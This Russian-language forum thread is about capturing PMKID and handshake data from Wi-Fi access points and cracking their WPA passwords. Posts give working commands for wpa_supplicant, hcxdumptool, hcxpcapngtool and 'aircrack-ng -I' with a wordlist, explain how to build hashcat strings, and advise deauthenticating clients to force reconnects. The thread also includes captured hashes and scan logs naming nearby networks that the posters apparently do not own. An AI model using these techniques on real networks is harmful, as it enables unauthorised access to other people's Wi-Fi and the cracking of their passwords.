Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery? Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше? В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.
Вы получили строку с PMKID (требуется удалить пробелы). Вам нужно знать ESSID и BSSID точки доступа, а также MAC-адрес вашей беспроводной карты. Последний можно узнать командой: Code: iw dev Из BSSID, MAC удаляете разделители, а ESSID преобразовываете в HEX с помощью сервиса. Затем просто составляете строку формата: pmkid*bssid*mac*essid и записываете в файл с расширением .16800, который можно скормить Hashcat. WiFiPR: находите конструктор PMKID и заполняете поля этими данными.
Если только в Wireless Password Recovery то проще с помощью конструктороа PMKID. https://www.passcape.com/wireless_password_recovery_pmkid_constructor_rus А если c помощью aircrack-ng ловите PMKID вставляетсая как и хендшейк в виде .cap файла AMAC это точка доступа ,а SMAC это ваш адаптер.Обратие внимание если у вас стоит в /etc/NetworkManager/conf.d/mac.conf как в Porteuse по умолчанию(клонирование мас) wifi.cloned-mac-address=stable то тот котрый был в момент подклбчения...
Важное замечание: в Aircrack-ng 1.6 добавлена возможность подавать PMKID как строку: Code: aircrack-ng -I "a33b5ba86374d241ab527a500124789b*c4c9ec10d0d2*acde489a876d*522d6c696e65" -w /path/to/dictionary
@4Fun, прив! Скажи, а есть где более-менее полный список устройств отдающих PMKID, по типу твоего для Pixie-Dust!? Не помешало бы его или ссылку на него добавить в шапку, да и твой тоже в соответствующей теме!
Наработки в этом направлении есть, но полноценного списка нет. Собирал данные (BSSID, в первую очередь) с wpa-sec.stanev.org, с темы перебора на этом форуме. В планах насобирать большое количество различных BSSID и обобщить этот список в список шаблонов (можно сказать, регулярных выражений или масок).
Всем доброго! Пытаюсь проводить мероприятия в данном направлении. Поступаю так. Обычным аирслаксом сканирую сети, выбираю интересующую, включаю перехват и если клиентов нет, то просто пытаюсь подключиться с другого устройства. Потом смотрю акулой захваченный сар файл и всю необходимую инфу оттуда выцепляю. Заметил некоторую особенность, а именно: 1. некотрые точки легко отдают все, мне необходимые, данные включая рмк 2. некоторые вообще не отдают ни одного еапол пакета, хоть тресни. 3. некоторые отдают рмк с номером 0400000000000000..... 4. а вот некоторые, сперва молчат ка рыба об лед, а потом отдают валидный рмк но совсем не с первого, а с пятого - десятого подключения. Четвертый пункт мне показался интересным, сразу скажу, что все происходит с нормальным или хорошим уровнем сигнала, дальнобоем вообще не интересуюсь.
Ребят. в видеоролике на ютубе - на 23 мин 40 сек PMKID атака | Новая техника не требующая клиентов на точке доступа | PMKID+Hashcat (у него Kali линукс) , на такую комманду: hcxpcaptool -i wlan0mon -о pmkid/capture.pcapng --enable status=15 У человечка выдаёт такое: https://clip2net.com/s/4bbNOIp https://clip2net.com/s/4bbNOYE А у меня в Porteus линукс, который идёт с Airslax Его комманда: hcxpcaptool -i wlan0mon -о pmkid/capture.pcapng --enable status=15 у меня не запустилась, но запустилась такая комманда: hcxdumptool -o test.pcapng -i wlan1mon --enable_status 15 почему у меня выдаёт другое ? имею ввиду такие строки: (и так далее) 17:55:12 4 ffffffffffff b0dfc1e39821 Tenda_E39820 [BEACON] 17:55:20 6 ffffffffffff c4ad34753be8 MikroTik-753BE8 [BEACON] Может мой адаптер (pci): Wireless D-Link DWL-G520 https://dlink.ru/ru/products/2/251.html не умеет аппаратно pmkid или ещё что то нужно набрать в терминале ? Вот мой полный текст из моего терминала: Spoiler: Вот мой полный текст из моего терминала: root@WiFI-Villain:~# hcxdumptool -o test.pcapng -i wlan1mon --enable_status 15 initialization... warning: wlan1mon is probably a virtual monitor interface and some attack modes may not work as expected interface is already in monitor mode start capturing (stop with ctrl+c) NMEA 0183 SENTENCE........: N/A INTERFACE NAME............: wlan1mon INTERFACE PROTOCOL........: IEEE 802.11 INTERFACE HARDWARE MAC....: 0015e945f4a8 DRIVER....................: ath5k DRIVER VERSION............: 4.14.0-porteus DRIVER FIRMWARE VERSION...: N/A openSSL version...........: 1.1 ERRORMAX..................: 100 errors BPF code blocks...........: 0 FILTERLIST ACCESS POINT...: 0 entries FILTERLIST CLIENT.........: 0 entries FILTERMODE................: unused WEAK CANDIDATE............: 12345678 ESSID list................: 0 entries ACCESS POINT (ROGUE)......: 0050c7610345 (BROADCAST HIDDEN) ACCESS POINT (ROGUE)......: 0050c7610346 (BROADCAST OPEN) ACCESS POINT (ROGUE)......: 0050c7610347 (incremented on every new client) CLIENT (ROGUE)............: b0ece1a25383 EAPOLTIMEOUT..............: 20000 usec EAPOLEAPTIMEOUT...........: 2500000 usec REPLAYCOUNT...............: 63496 ANONCE....................: 25096bf1d4b835378d4520ea635da21691758c21fa1dbc68e0f822c2d3a547bd SNONCE....................: 6a2e6ca4943be2b80d2ff3c26fa0a7c71f7ce6e05930d34aad80e40520763bd8 17:55:03 1 ffffffffffff 28285dd5f6c8 Keenetic-8439 [BEACON] 17:55:03 1 ffffffffffff 50ff2003e98c Keenetic-9791 [BEACON] 17:55:04 2 ffffffffffff e4beed8a17a2 hello [BEACON] 17:55:07 2 ffffffffffff 50ff2043a646 Keenetic-1983 [BEACON] 17:55:12 4 ffffffffffff b0dfc1e39821 Tenda_E39820 [BEACON] 17:55:20 6 ffffffffffff c4ad34753be8 MikroTik-753BE8 [BEACON] 17:55:22 6 ffffffffffff 84c9b249b187 dlink [BEACON] 17:55:28 8 ffffffffffff 647002cd7418 TP-LINK_CD7418 [BEACON] 17:55:29 8 ffffffffffff 52ff2045e557 [HIDDEN BEACON] 17:55:30 8 ffffffffffff 50ff2045e557 Keenetic-3662 [BEACON] 17:55:36 10 ffffffffffff 74da881116a4 Pain inc. [BEACON] 17:55:36 10 ffffffffffff cc32e570973d TP-Link_973D [BEACON] 17:55:40 11 ffffffffffff c471540d26f2 TP-LINK_26F2 [BEACON] 17:55:40 11 ffffffffffff 2c56dccff840 ASUS 99 [BEACON] 17:55:40 11 ffffffffffff bcf6853c74f2 DIR-300NRUB6 [BEACON] 17:55:42 11 ffffffffffff 8a7b5bd936c3 Nataly [BEACON] 17:55:56 1 ffffffffffff 386b1ca432d6 MERCUSYS_32D6 [BEACON] 17:55:56 1 ffffffffffff ee43f6d60020 armkart [BEACON] 17:56:19 6 ffffffffffff 1e5bb3041694 AndroidAP3A19 [BEACON] 17:56:24 8 ffffffffffff 50ff201ae7e0 Keenetic-7701 [BEACON] 17:56:26 8 ffffffffffff 52ff204ae7e0 [HIDDEN BEACON]
Наверное тут на форуме было это уже много раз тут. Но я лично не читал пока что про прогу CommView В ролике довольно быстро и просто вроде бы поймал - Pmkid: Конектился к wi-fi точке - с Любым паролем Extract PMKID On Windows Using CommView To Be Used On HashCat - YouTube
а ты не знаешь, что делать с этим Key , который мне выдала прога (или роутер ? ) на вкладке Other в WifiSlax 4.12 в программе WifiMetrropolis 3 ? это вообще что за аттака ? по wps ? попробовал с этим кеем приконнектиться к wi-fi - Tenda_E39820 - не коннектиться. потом попробовал его ввести как wps ключ и потом скан по wps через Reaver (в Airslax 5.14 pro) - но тишина. https://clip2net.com/s/4bd9hR8
да странно что в терминале часто при поимке хш вылазит типа "обнаружен мпкид" - по сути то одно и тоже? но отдельно не записывает (( печалька.
Я начинаю ловить PMKID cначала WifiMetropolis тк сразу получается PMKID в формате cap и его можно вставить сразу в WPR не извлекая вручную.Также сразу можно проверить на валидность пойманный PMKID нажав кнопку Aircrack-ng -там сразу видно валидный он или нет. Короче очень быстро ловится или если не ловится то понимаешь что он вообще не поймается тк нет клиентов.Тогда переходите к способу wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1 Короче как выбрали целевую точку при сканировании- есть клиенты или нет сразу глушите точку- нажимайте кнопку DesAutenticacion(которая крайне правая и красная) Если клент есть он появится через 5-10 сек.Если нет то он и не появится.Наверное aircrack-ng скачет по каналам и не всегда видит клиентов.А тут когда сканируете на отельном канале то они появляются бытро.Если есть клиенты то нажимайте DesAutenticacion(левая чёрная) Естественно aircrack-ng 1.6 должен быть установлен.Кстати пользуюсь Wifislax 4.12 XFCE поздние версии KDE а это вроде зло Кстати разработчики Kali наконец-то по умолчанию ставаят самое нормальное окружение XFCE
Ребята помогите распарсить файлик. Запустил так ... Code: hcxdumptool -i wlan0 --disable_disassociations -o test.pcapng --enable_status=15 потом сконвертил в новый формат. Code: hcxpcapngtool -o test.22000 test.pcapng на выходе файлик test.22000, содержание вида: Code: WPA*02*245863d2dde9eef882993e5ff83a5478*18a6f7f88e50*ec6c9a674ef2*554b7274656c65636f6d5f463838453530*4ac1b5a688571792942695c66f672a836534df844ced1f8c30b926aaff75a233*0103007502010a00000000000000000002a86bec58dc2aa88e46c404401b77d0ba37e84dc1c7bfe6b3edbac79a7786c931000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*02 WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ecae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212809c9929a40a94cfe6fe8161d101a42e4030563*0103007502010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c81964faa7f44076fc40150affcb58b5ba3bbfb3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*02 WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ecae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02030a001000000000000000027f0a607246336a6fe230e192fef5876b835b07dba5572c7760baf54993a685010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000*05 Вопрос кто подскажет что в этой строке нужное ... я так понимаю тут несколько сетей. Как определить какая из них какая ?
Тут получаются разные хэши изза того что разные маки использовались для конекшена... уже понял. Code: WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ecae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212809c9929a40a94cfe6fe8161d101a42e4030563*0103007502010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c81964faa7f44076fc40150affcb58b5ba3bbfb3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*02 WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ecae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02030a001000000000000000027f0a607246336a6fe230e192fef5876b835b07dba5572c7760baf54993a685010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000*05 Спасибо большое!